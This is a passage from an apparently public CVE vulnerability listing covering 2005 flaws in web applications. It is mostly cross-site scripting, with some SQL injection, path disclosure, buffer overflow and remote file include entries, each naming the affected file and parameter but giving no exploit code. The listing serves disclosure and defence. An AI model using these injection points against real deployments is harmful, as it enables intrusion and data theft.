web script or HTML via unspecified search parameters, possibly the q parameter. [CVE-2005-4388] Cross-site scripting (XSS) vulnerability in search.cfm in CONTENS 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the near parameter. [CVE-2005-4387] Cross-site scripting (XSS) vulnerability in home.php in contenite 0.11 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2005-4386] Cross-site scripting (XSS) vulnerability in Colony CMS 2.75 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. [CVE-2005-4385] Cross-site scripting (XSS) vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. [CVE-2005-4383] Cross-site scripting (XSS) vulnerability in index.cfm in CitySoft Community Enterprise 4.x allows remote attackers to inject arbitrary web script or HTML via the (1) presentationSite, (2) docPublishYear, (3) docDescription, (4) publishState, (5) docAuthor, (6) docTitle, (7) subTopic, (8) topic, (9) topicRadio, (10) topicOnly, (11) startrow, and (12) sortby parameters. [CVE-2005-4381] Multiple cross-site scripting (XSS) vulnerabilities in Caravel CMS 3.0 Beta 1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) fileDN and (2) folderviewer_attrs parameters. [CVE-2005-4379] Multiple cross-site scripting (XSS) vulnerabilities in Bitweaver 1.1 and 1.1.1 beta allow remote attackers to inject arbitrary web script or HTML via the (1) sort_mode parameter to (a) fisheye/list_galleries.php, (b) messages/message_box.php, and (c) users/my.php [CVE-2005-4377] Cross-site scripting (XSS) vulnerability in Page.asp in Baseline CMS 1.95 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) PageID and (2) SiteNodeID parameters. [CVE-2005-4375] Cross-site scripting (XSS) vulnerability in Amaxus 3 and earlier allows remote attackers to inject arbitrary web script or HTML via the change parameter. NOTE: it is possible that this is resultant from CVE-2005-4376. [CVE-2005-4374] Multiple cross-site scripting (XSS) vulnerabilities in Allinta 2.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) s parameter to faq.asp and (2) searchQuery parameter to search.asp. [CVE-2005-4373] Adaptive Website Framework (AWF) 2.10 and earlier allows remote attackers to obtain the full path of the application via an invalid mode parameter to community.html, which leaks the path in an error message. [CVE-2005-4372] Cross-site scripting (XSS) vulnerability in account.html in Adaptive Website Framework (AWF) 2.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2005-4371] Acidcat 2.1.13 and earlier stores the database under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a request to databases/acidcat.mdb. [CVE-2005-4369] Cross-site scripting (XSS) vulnerability in Acuity CMS 2.6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly strSearchKeywords to browse.asp. [CVE-2005-4368] roundcube webmail Alpha, with a default high verbose level ($rcmail_config['debug_level'] = 1), allows remote attackers to obtain the full path of the application via an invalid_task parameter, which leaks the path in an error message. [CVE-2005-4367] Cross-site scripting (XSS) vulnerability in register_domain.php in DRZES HMS 3.2 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the "Domain Availability" field. NOTE: this issue was later reported to affect CONTROLzx (renamed from DRZES) 3.3.4. [CVE-2005-4365] Multiple cross-site scripting (XSS) vulnerabilities in FLIP 0.9.0.1029 allow remote attackers to inject arbitrary web script or HTML via the (1) name parameter in text.php and (2) frame parameter in forum.php. [CVE-2005-4364] Cross-site scripting (XSS) vulnerability in index.cfm in Hot Banana Web Content Management Suite 5.3 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2005-4363] Cross-site scripting (XSS) vulnerability in the search engine in Komodo CMS 2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. [CVE-2005-4361] Cross-site scripting (XSS) vulnerability in search.html in Magnolia Content Management Suite 2.1 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2005-4355] Multiple cross-site scripting (XSS) vulnerabilities in UStore allow remote attackers to inject arbitrary web script or HTML via the (1) Cat parameter in default.asp and the (2) accessdenied parameter in admin/default.asp. NOTE: the provenance of this information is unknown [CVE-2005-4354] Cross-site scripting (XSS) vulnerability in webglimpse.cgi in Webglimpse 2.14.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2005-4339] Cross-site scripting (XSS) vulnerability in Blackboard Learning and Community Portal System in Academic Suite 6.3.1.424, 6.2.3.23, and other versions before 6 allows remote attackers to inject arbitrary web script or HTML via the context parameter to announcement.pl, which is reflected in the resulting page. [CVE-2005-4336] Cross-site scripting (XSS) vulnerability in ProjectForum 4.7.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) fwd parameter in admin/adminsignin.html and (2) originalpageid parameter in admin/newpage.html associated with a group. [CVE-2005-4333] Multiple cross-site scripting (XSS) vulnerabilities in Binary Board System (BBS) 0.2.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) inreplyto, (2) article, and (3) board parameters to reply.pl, (4) branch, (5) board, and (6) stats.pl parameters to (b) stats.pl, and (7) board parameter to (c) toc.pl. [CVE-2005-4328] Cross-site scripting (XSS) vulnerability in webglimpse.cgi in Webglimpse 2.14.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the ID parameter. [CVE-2005-4327] Multiple cross-site scripting (XSS) vulnerabilities in Michael Arndt WebCal 1.11-3.04 allow remote attackers to inject arbitrary web script or HTML via the (1) function, (2) year, and (3) date parameters to webcal.cgi, (4) new calendar entries, and (5) notes for entries. [CVE-2005-4323] Unspecified vulnerability in Hitachi Cosminexus Collaboration Portal 06-00 through 06-10-/B, Groupmax Collaboration Portal 07-00 through 07-10-/B, and Groupmax Collaboration Web Client 07-00 through 07-10-/A allow remote attackers to cause a denial of service of unspecified impact via repeated invalid requests to the Schedule component. [CVE-2005-4322] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Cosminexus Collaboration Portal 06-00 through 06-10-/B, Groupmax Collaboration Portal 07-00 through 07-10-/B, and Groupmax Collaboration Web Client 07-00 through 07-10-/A allow remote attackers to inject arbitrary web script or HTML via the (1) Schedule and (2) Calendar components. [CVE-2005-4314] Cross-site scripting (XSS) vulnerability in ppcal.cgi in PPCal Shopping Cart 3.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) stop and (2) user parameters. [CVE-2005-4311] Cross-site scripting (XSS) vulnerability in DCForum 6.25 and earlier, and possibly DCForum+ 1.x, allows remote attackers to inject arbitrary web script or HTML via (1) the page parameter in dcboard.php and (2) unspecified search parameters. [CVE-2005-4307] Cross-site scripting (XSS) vulnerability in ScareCrow 2.13 and earlier allows remote attackers to inject arbitrary web script or HTML via the forum parameter to (1) forum.cgi and (2) post.cgi, or (3) the user parameter to profile.cgi. [CVE-2005-4306] Multiple cross-site scripting (XSS) vulnerabilities in SiteNet BBS 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) pg, (2) tid, (3) cid, and (4) fid parameters to netboardr.cgi, or (5) cid parameter to search.cgi. [CVE-2005-4305] Cross-site scripting (XSS) vulnerability in Edgewall Trac 0.9, 0.9.1, and 0.9.2 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly sanitized before it is returned in an error page. [CVE-2005-4301] Cross-site scripting (XSS) vulnerability in phpXplorer 0.9.12 and earlier allows remote attackers to inject arbitrary web script or HTML via the address bar field. [CVE-2005-4299] Cross-site scripting (XSS) vulnerability in atl.cgi in Atlant Pro 4.02 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) before and (2) ct parameters. [CVE-2005-4298] Cross-site scripting (XSS) vulnerability in atl.cgi in AtlantForum 4.02 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) sch_allsubct, (2) before, and (3) ct parameters. [CVE-2005-4297] Cross-site scripting (XSS) vulnerability in bbBoard 2.56 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly via the "keys" parameter. [CVE-2005-4295] Cross-site scripting (XSS) vulnerability in Absolute Image Gallery XE 2.x allows remote attackers to inject arbitrary web script or HTML via the text parameter. NOTE: the provenance of this information is unknown [CVE-2005-4294] Cross-site scripting (XSS) vulnerability in Alkacon OpenCms before 6.0.3 allows remote attackers to inject arbitrary web script or HTML via the username in the login page. [CVE-2005-4293] Cross-site scripting (XSS) vulnerability in cp-app.cgi in ClickCartPro (CCP) 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the affl parameter. [CVE-2005-4292] Cross-site scripting (XSS) vulnerability in CommerceSQL 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters, possibly the keywords parameter in the Quick Find feature. [CVE-2005-4291] Cross-site scripting (XSS) vulnerability in cart.cgi in ECTOOLS Onlineshop 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) product, (2) category, and (3) uid parameters. [CVE-2005-4290] Cross-site scripting (XSS) vulnerability in index.cgi in ECW-Cart 2.03 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) kword, (2) max, (3) min, (4) comp, and (5) f parameters. [CVE-2005-4289] Cross-site scripting (XSS) vulnerability in EDCstore.pl in eDatCat 0.3 allows remote attackers to inject arbitrary web script or HTML via the user_action parameter. [CVE-2005-4288] Cross-site scripting (XSS) vulnerability in index.php in MarmaraWeb E-commerce allows remote attackers to inject arbitrary web script or HTML via the page parameter to index.php. NOTE: this might be resultant from CVE-2005-4287. [CVE-2005-4287] PHP remote file include vulnerability in MarmaraWeb E-commerce allows remote attackers to execute arbitrary code via the page parameter to index.php. [CVE-2005-4285] Cross-site scripting (XSS) vulnerability in pdestore.cgi in Dick Copits PDEstore 1.8 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) the search module parameter or the (2) product and (3) cart_id parameters. [CVE-2005-4284] Cross-site scripting (XSS) vulnerability in StaticStore Search Engine 1.189A and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to search.cgi, possibly the keywords parameter. NOTE: this issue was originally disputed by the vendor, but it has since been acknowledged. [CVE-2005-4283] Cross-site scripting (XSS) vulnerability in The CITY Shop 1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via parameters to the search module, possibly SKey to store.cgi. [CVE-2005-4282] Cross-site scripting (XSS) vulnerability in Zaygo DomainCart 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML, possibly via the root parameter to zaygo.cgi. [CVE-2005-4281] Cross-site scripting (XSS) vulnerability in Zaygo HostingCart 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via certain search module parameters, possibly the root parameter to zaygo.cgi. [CVE-2005-4277] Cross-site scripting (XSS) vulnerability in index.php in toendaCMS before 0.7 Beta allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2005-4274] Unspecified vulnerability in Business Objects WebIntelligence 6.5x allows remote attackers to cause a denial of service (user account lock out) via unknown attack vectors related to "authentication mechanisms" and "form input." [CVE-2005-4270] Buffer overflow in Watchfire AppScan QA 5.0.609 and 5.0.134 allows remote web servers to execute arbitrary code via an HTTP 401 response with a WWW-Authenticate header containing a long Realm field. [CVE-2005-4262] Cross-site scripting (XSS) vulnerability in the News module in Envolution allows remote attackers to inject arbitrary web script or HTML via the (1) startrow and (2) catid parameter. NOTE: this issue might be resultant from the SQL injection problem (CVE-2005-4263). [CVE-2005-4260] Interpretation conflict in includes/mainfile.php in PHP-Nuke 7.9 and later allows remote attackers to perform cross-site scripting (XSS) attacks by replacing the ">" in the tag with a "<", which bypasses the regular expressions that sanitize the data, but is automatically corrected by many web browsers. NOTE: it could be argued that this vulnerability is due to a design limitation of many web browsers [CVE-2005-4256] Cross-site scripting (XSS) vulnerability in forum.asp in ASP-DEV XM Forum RC3 allows remote attackers to inject arbitrary web script or HTML via the forum_title parameter. NOTE: the provenance of this issue is unknown [CVE-2005-4255] Cross-site scripting (XSS) vulnerability in TextSearch in WikkaWiki 1.1.6.0 allows remote attackers to inject arbitrary web script or HTML via a hex-encoded phrase parameter. [CVE-2005-4253] Cross-site scripting (XSS) vulnerability in getdox.php in Torrential 1.2 allows remote attackers to inject arbitrary web script or HTML via the URL. NOTE: this might be resultant from CVE-2005-4160. [CVE-2005-4252] Cross-site scripting (XSS) vulnerability in mcGallery PRO 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters. [CVE-2005-4249] ADP Forum 2.0 through 2.0.3 stores sensitive information in plaintext files under the web document root with insufficient access control, which allows remote attackers to obtain user credentials via requests to the forum/users directory. [CVE-2005-4248] Multiple cross-site scripting (XSS) vulnerabilities in QuickPayPro 3.1 allow remote attackers to inject arbitrary web script or HTML via various fields, such as those in (1) communication/subscribers.tracking.add.php, (2) support/tickets.add.php, and (3) mycompany/categories.php. [CVE-2005-4247] Cross-site scripting (XSS) vulnerability in index.php in Plogger Beta 2 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter. [CVE-2005-4245] Cross-site scripting (XSS) vulnerability in search.php in Snipe Gallery 3.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. [CVE-2005-4242] Multiple cross-site scripting (XSS) vulnerabilities in Horde Turba H3 2.0.4 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the address book and (2) contact data. [CVE-2005-4241] Cross-site scripting (XSS) vulnerability in the category page in VCD-db 0.98 and earlier allows remote attackers to inject arbitrary web script or HTML via the batch parameter. [CVE-2005-4239] Cross-site scripting (XSS) vulnerability in Search/DisplayResults.php in PHP JackKnife 2.21 and earlier allows remote attackers to inject arbitrary web script or HTML via URL-encoded values in the sKeywords parameter. [CVE-2005-4238] Cross-site scripting (XSS) vulnerability in view_filters_page.php in Mantis 1.0.0rc3 and earlier allows remote attackers to inject arbitrary web script or HTML via the target_field parameter. [CVE-2005-4237] Cross-site scripting (XSS) vulnerability in MySQL Auction 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters, possibly the keyword parameter in the SearchZoom module. [CVE-2005-4236] Cross-site scripting (XSS) vulnerability in search.php in CKGOLD allows remote attackers to inject arbitrary web script or HTML via the search parameters. [CVE-2005-4235] Cross-site scripting (XSS) vulnerability in knowledgebase.php in WHMCompleteSolution 2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameters. [CVE-2005-4231] Cross-site scripting (XSS) vulnerability in Link Up Gold 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) link parameter to tell_friend.php, (2) phrase[] parameter to search.php in a search_links_advanced action, and the (3) direction or (4) sort parameter to articles.php. [CVE-2005-4229] Cross-site scripting (XSS) vulnerability in auction.pl in EveryAuction 1.53 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. NOTE: the provenance of this issue is unknown [CVE-2005-4228] Multiple SQL injection vulnerabilities in PhpWebGallery 1.5.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) since, (2) sort_by, and (3) items_number parameters to comments.php, (4) the search parameter to category.php, and (5) image_id parameter to picture.php. NOTE: it was later reported that the comments.php/sort_by vector also affects 1.7.2 and earlier. [CVE-2005-4226] Multiple "potential" SQL injection vulnerabilities in phpWebThings 1.4 Patched might allow remote attackers to execute arbitrary SQL commands via (1) the ref parameter in download.php, (2) the direction, msg, sforum, reason, subname, and toform parameters in forum.php, (3) the msg and forum parameters in forum_edit.php, (4) the msg and forum parameters in forum_write.php, (5) the tekst parameter in guestbook.php, (6) the menuoption parameter in index.php, and the (7) sel_avatar parameter in myaccount.php. NOTE: the forum.php/forum vector is already identified by CVE-2005-3585. [CVE-2005-4222] Multiple cross-site scripting (XSS) vulnerabilities in guestbook.cgi in Lars Ellingsen Guestserver 4.13 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified message fields. [CVE-2005-4220] Netgear RP114, and possibly other versions and devices, allows remote attackers to cause a denial of service via a SYN flood attack between one system on the internal interface and another on the external interface, which temporarily stops routing between the interfaces, as demonstrated using nmap. [CVE-2005-4219] setting.php in Innovative CMS (ICMS, formerly Imoel-CMS) contains username and password information in cleartext, which might allow attackers to obtain this information via a direct request to setting.php. NOTE: on a properly configured web server, it would be expected that a .php file would be processsed before content is returned to the user, so this might not be a vulnerability. [CVE-2005-4218] SQL injection vulnerability in forum.php in PHPWebThings 1.4 allows remote attackers to execute arbitrary SQL commands via the msg parameter, a different vulnerability than CVE-2005-3585. [CVE-2005-4209] WorldClient webmail in Alt-N MDaemon 8.1.3 allows remote attackers to prevent arbitrary users from accessing their inboxes via script tags in the Subject header of an e-mail message, which prevents the user from being able to access the Inbox folder, possibly due to a cross-site scripting (XSS) vulnerability. [CVE-2005-4207] SQL injection vulnerability in BTGrup Admin WebController Script allows remote attackers to execute SQL commands via the (1) Username and (2) Password fields. [CVE-2005-4205] Cross-site scripting (XSS) vulnerability in searchdb.asp in LocazoList 1.03c and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-4196] Multiple cross-site scripting (XSS) vulnerabilities in Scout Portal Toolkit (SPT) 1.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the ss parameter in SPT--QuickSearch.php [CVE-2005-4193] Cross-site scripting (XSS) vulnerability in UseBB before 0.7 allows remote attackers to inject arbitrary web script or HTML via the $_SERVER['PHP_SELF'] variable. [CVE-2005-4192] Multiple cross-site scripting (XSS) vulnerabilities in templates/notepads/notepads.inc in Horde Mnemo Note Manager H3 before 2.0.3 allow remote authenticated users to inject arbitrary web script or HTML via (1) the notepad's name or (2) description, when creating a new notepad. [CVE-2005-4191] Multiple cross-site scripting (XSS) vulnerabilities in templates/tasklists/tasklists.inc in Horde Nag Task List Manager H3 before 2.0.4 allow remote authenticated users to inject arbitrary web script or HTML via (1) the tasklist's name or (2) description, when creating a new tasklist. [CVE-2005-4190] Multiple cross-site scripting (XSS) vulnerabilities in Horde Application Framework before 3.0.8 allow remote authenticated users to inject arbitrary web script or HTML via multiple vectors, as demonstrated by (1) the identity field, (2) Category and (3) Label search fields, (4) the Mobile Phone field, and (5) Date and (6) Time fields when importing CSV files, as exploited through modules such as (a) Turba Address Book, (b) Kronolith, (c) Mnemo, and (d) Nag. [CVE-2005-4189] Multiple cross-site scripting (XSS) vulnerabilities in Horde Kronolith H3 before 2.0.6 allow remote authenticated users to inject arbitrary web script or HTML via (1) the Calendar name field when creating calendars, (2) event title field when deleting events, the (3) Category and (4) Location search fields, and the (5) attendees email address fields when editing event attendees, and possibly other vectors. [CVE-2005-4177] Cross-site scripting (XSS) vulnerability in book.cfm in Magic Book Personal and Professional 2.0 allows remote attackers to inject arbitrary web script or HTML via the StartRow parameter. [CVE-2005-4167] Cross-site scripting (XSS) vulnerability in eFiction 1.0 and 1.1 allows remote attackers to inject arbitrary web script or HTML via the let parameter in a viewlist action to titles.php. [CVE-2005-4166] Cross-site scripting (XSS) vulnerability in password.asp in DUWare DUportal Pro 3.4.3 allows remote attackers to inject arbitrary web script or HTML via the result parameter. [CVE-2005-4162] Cross-site scripting (XSS) vulnerability in cal_make.pl in ACME PerlCal 2.99.20 allows remote attackers to inject arbitrary web script or HTML via the p0 parameter. [CVE-2005-4161] DISPUTED Multiple cross-site scripting (XSS) vulnerabilities in MilliScripts 1.4 redirect script allow remote attackers to inject arbitrary web script or HTML via the domainname parameter to register.php, and other unspecified vectors. NOTE: the vendor has disputed this issue, stating "No invalid input can reach the script." [CVE-2005-4154] Unspecified vulnerability in PEAR installer 1.4.2 and earlier allows user-assisted attackers to execute arbitrary code via a crafted package that can execute code when the pear command is executed or when the Web/Gtk frontend is loaded. [CVE-2005-4140] SQL injection vulnerability in admin/login/index.php in Website Baker 2.6.0 allows remote attackers to execute arbitrary SQL commands via the username parameter, as used by the user field. [CVE-2005-4138] Multiple cross-site scripting (XSS) vulnerabilities in ThWboard before 3 Beta 2.84 allow remote attackers to inject arbitrary web script or HTML via the (1) Wohnort and (2) Beruf fields in editprofile.php, (3) user parameter array in v_profile.php, and (4) the action parameter in misc.php. [CVE-2005-4136] Cross-site scripting (XSS) vulnerability in login.php in DRZES HMS 3.2 allows remote attackers to inject arbitrary web script or HTML via the customerEmailAddress parameter. [CVE-2005-4134] Mozilla Firefox 1.5, Netscape 8.0.4 and 7.2, and K-Meleon before 0.9.12 allows remote attackers to cause a denial of service (CPU consumption and delayed application startup) via a web site with a large title, which is recorded in history.dat but not processed efficiently during startup. NOTE: despite initial reports, the Mozilla vendor does not believe that this issue can be used to trigger a crash or buffer overflow in Firefox. Also, it has been independently reported that Netscape 8.1 does not have this issue. [CVE-2005-4133] Sun Update Connection in Sun Solaris 10, when configured to use a web proxy, allows local users to obtain the proxy authentication password via (1) an unspecified vector and (2) proxy log files. [CVE-2005-4091] Cross-site scripting (XSS) vulnerability in 1search.cgi in 1-Script 1-Search 1.8 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-4085] Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute arbitrary code via a long Host: header. [CVE-2005-4078] Multiple cross-site scripting (XSS) vulnerabilities in Ideal BB.NET 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) forumID, (2) boardID, and (3) topicRepeater1-p parameters in topics.aspx, (4) boardID parameter in categoryindex.aspx, (5) postID parameter in posts.aspx, (6) catID parameter in forums.aspx, and (7) memberID parameter in member.aspx. [CVE-2005-4075] Multiple cross-site scripting (XSS) vulnerabilities in index.cfm in CF_Nuke 4.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) topic and (2) newsid parameter in the news sector, and (3) cat parameter in the links sector. [CVE-2005-4072] Cross-site scripting (XSS) vulnerability in CFMagic Magic Forum Personal 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the Words parameter in search_forums.cfm, as used in the "Search For:" field. [CVE-2005-4063] Multiple cross-site scripting (XSS) vulnerabilities in NetAuctionHelp 3.0 and earlier allow remote attackers to inject arbitrary HTML and web script via the (1) L, (2) sort, (3) category, (4) categoryname parameters to search.asp. [CVE-2005-4062] Cross-site scripting (XSS) vulnerability in CPSearch.asp in XcClassified 3.x allows remote attackers to inject arbitrary web script or HTML via the search parameters. [CVE-2005-4061] Cross-site scripting (XSS) vulnerability in PASearch.asp in XcPhotoAlbum 1.x allows remote attackers to inject arbitrary web script or HTML via the search parameters. [CVE-2005-4060] Cross-site scripting (XSS) vulnerability in search.asp in rwAuction Pro 4.0 and 5.0 allows remote attackers to inject arbitrary web script or HTML via the searchtxt parameter. [CVE-2005-4057] Cross-site scripting (XSS) vulnerability in search.php in PluggedOut Nexus 0.1 allows remote attackers to inject arbitrary web script or HTML via the (1) Location, (2) Last Name, and (3) First Name parameters. [CVE-2005-4053] Cross-site scripting (XSS) vulnerability in coWiki 0.3.4 allows remote attackers to inject arbitrary web script or HTML via the q parameter, as demonstrated using 26.html. [CVE-2005-4052] e107 0.6174 allows remote attackers to redirect users to other web sites via the download parameter in rate.php, which is used after a user submits a file download rating. NOTE: in the default installation, the e_BASE variable restricts the redirection to the same web site. [CVE-2005-4047] Cross-site scripting (XSS) vulnerability in kb.asp in IISWorks ASPKnowledgeBase 2.0 allows remote attackers to inject arbitrary web script or HTML via the a parameter. [CVE-2005-4046] Unspecified vulnerability in Reverse SSL Proxy Plug-in for Sun Java System Application Server Standard Edition 7 2004Q2, Application Server Enterprise Edition 8.1 2005Q1, and Sun ONE Application Server 7 Standard Edition, as used in multiple web servers, allows remote attackers to conduct man-in-the-middle (MITM) attacks and "compromise data privacy." [CVE-2005-4044] Cross-site scripting (XSS) vulnerability in search.cgi in Amazon Search Directory 1.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly the search parameter. [CVE-2005-4042] Cross-site scripting (XSS) vulnerability in Warm Links 1.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a parameter to search.cgi. [CVE-2005-4041] Cross-site scripting (XSS) vulnerability in search.cgi in MR CGI Guy Hot Links SQL 3.1.x and Hot Links Pro 3.1.x allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2005-4039] Directory traversal vulnerability in arhiva.php in Web4Future Portal Solutions News Portal allows remote attackers to read arbitrary files via the dir parameter. [CVE-2005-4038] SQL injection vulnerability in comentarii.php in Web4Future Portal Solutions News Portal allows remote attackers to execute arbitrary SQL commands via the idp parameter. [CVE-2005-4037] SQL injection vulnerability in functions.php in Web4Future Affiliate Manager PRO 4.1 and earlier allows remote attackers to execute arbitrary SQL commands via the pid parameter. [CVE-2005-4036] Cross-site scripting (XSS) vulnerability in index.cgi in Web4Future KeyWord Frequency Counter 1.0 allows remote attackers to inject arbitrary web script or HTML via the "remote URL." [CVE-2005-4035] Multiple SQL injection vulnerabilities in Web4Future eCommerce Enterprise Edition 2.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) prod, and (2) brid parameters to (a) view.php [CVE-2005-4034] Multiple SQL injection vulnerabilities in Web4Future eDating Professional 5 allow remote attackers to execute arbitrary SQL commands via the (1) s, (2) pg, and (3) sortb parameters to (a) index.php [CVE-2005-4032] Cross-site scripting (XSS) vulnerability in search.cgi in Easy Search System 1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-4029] WebEOC before 6.0.2 allows remote attackers to obtain valid usernames via the HTML source of the WebEOC login webpage, which could be useful in other attacks such as locking out valid users via brute force methods. [CVE-2005-4028] Multiple cross-site scripting (XSS) vulnerabilities in aMember allow remote attackers to inject arbitrary web script or HTML via the (1) lamember_login parameter to sendpass.php and (2) login parameter to member.php. [CVE-2005-4026] search.php in Geeklog 1.4.x before 1.4.0rc1, and 1.3.x before 1.3.11sr3, allows remote attackers to obtain sensitive information via invalid (1) datestart and (2) dateend parameters, which leaks the web server path in an error message. [CVE-2005-4024] Cross-site scripting (XSS) vulnerability in Interspire FastFind 2004 and 2005 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2005-4022] Cross-site scripting (XSS) vulnerability in the "Add Image From Web" feature in Gallery 2.0 before 2.0.2 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag. [CVE-2005-4021] The installer for Gallery 2.0 before 2.0.2 stores the install log under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information. [CVE-2005-4015] PHP Web Statistik 1.4 does not rotate the log database or limit the size of the referer field, which allows remote attackers to fill the log files via a large number of requests, as demonstrated using pixel.php. [CVE-2005-4014] stat.php in PHP Web Statistik 1.4 allows remote attackers to cause a denial of service (CPU consumption) via a large lastnumber value. [CVE-2005-4013] PHP Web Statistik 1.4 stores the stat.cfg file under the web root with insufficient access control, which allows remote attackers to obtain sensitive information such as statistics and the log directory location, possibly including the logdb.dta file. [CVE-2005-4012] Multiple cross-site scripting (XSS) vulnerabilities in PHP Web Statistik 1.4 allows remote attackers to inject arbitrary web script or HTML via (1) the lastnumber parameter to stat.php and (2) the HTTP referer to pixel.php. [CVE-2005-4004] Cross-site scripting (XSS) vulnerability in search.asp in MyTemplateSite 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-4002] WebEOC before 6.0.2 uses the same secret key for all installations, which allows attackers with the key to decrypt data from any WebEOC installation. [CVE-2005-4000] Cross-site scripting (XSS) vulnerability in archive.asp in SiteBeater News System 4.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the sKeywords parameter. [CVE-2005-3999] Cross-site scripting (XSS) vulnerability in Search.asp in SiteBeater MP3 Catalog 2.03 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2005-3998] Cross-site scripting (XSS) vulnerability in search.asp in Solupress News 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2005-3997] Zen Cart 1.2.6d and earlier, under certain PHP configurations, allows remote attackers to obtain sensitive information via direct requests to files in the admin/includes directory, including (1) graphs/banner_daily.php, (2) graphs/banner_infobox.php, (3) graphs/banner_yearly.php, (4) graphs/banner_monthly.php, (5) application_bottom.php, (6) attributes_preview.php, (7) modules/category_product_listing.php, (8) modules/copy_to_confirm.php, (9) modules/delete_product_confirm.php, and (10) modules/move_product_confirm.php, which leaks the web server path in the resulting error message. [CVE-2005-3991] Multiple cross-site scripting (XSS) vulnerabilities in phpMyChat 0.14.6 allow remote attackers to inject arbitrary web script or HTML via the medium parameter to (1) start_page.css.php and (2) style.css.php [CVE-2005-3984] SQL injection vulnerability in WebCalendar 1.0.1 allows remote attackers to execute arbitrary SQL commands via the time_range parameter to edit_report_handler.php. NOTE: the startid/activity_log.php vector is already covered by CVE-2005-3949. [CVE-2005-3982] CRLF injection vulnerability in layers_toggle.php in WebCalendar 1.0.1 might allow remote attackers to modify HTTP headers and conduct HTTP response splitting attacks via the ret parameter, which is used to redirect URL requests. [CVE-2005-3977] Cross-site scripting (XSS) vulnerability in QualityEBiz Quality PPC 1553 allows remote attackers to inject web script or HTML via the REQ parameter to the search module. [CVE-2005-3975] Interpretation conflict in file.inc in Drupal 4.5.0 through 4.5.5 and 4.6.0 through 4.6.3 allows remote authenticated users to inject arbitrary web script or HTML via HTML in a file with a GIF or JPEG file extension, which causes the HTML to be executed by a victim who views the file in Internet Explorer as a result of CVE-2005-3312. NOTE: it could be argued that this vulnerability is due to a design flaw in Internet Explorer and the proper fix should be in that browser [CVE-2005-3973] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 4.5.0 through 4.5.5 and 4.6.0 through 4.6.3 allow remote attackers to inject arbitrary web script or HTML via various HTML tags and values, such as the (1) legend tag and the value parameter used in (2) label and (3) input tags, possibly due to an incomplete blacklist. [CVE-2005-3972] Cross-site scripting (XSS) vulnerability in extremesearch.php in Extreme Search Corporate Edition 6.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2005-3971] Cross-site scripting (XSS) vulnerability in the login form in Citrix MetaFrame Secure Access Manager 2.0 through 2.2 and NFuse Elite 1.0 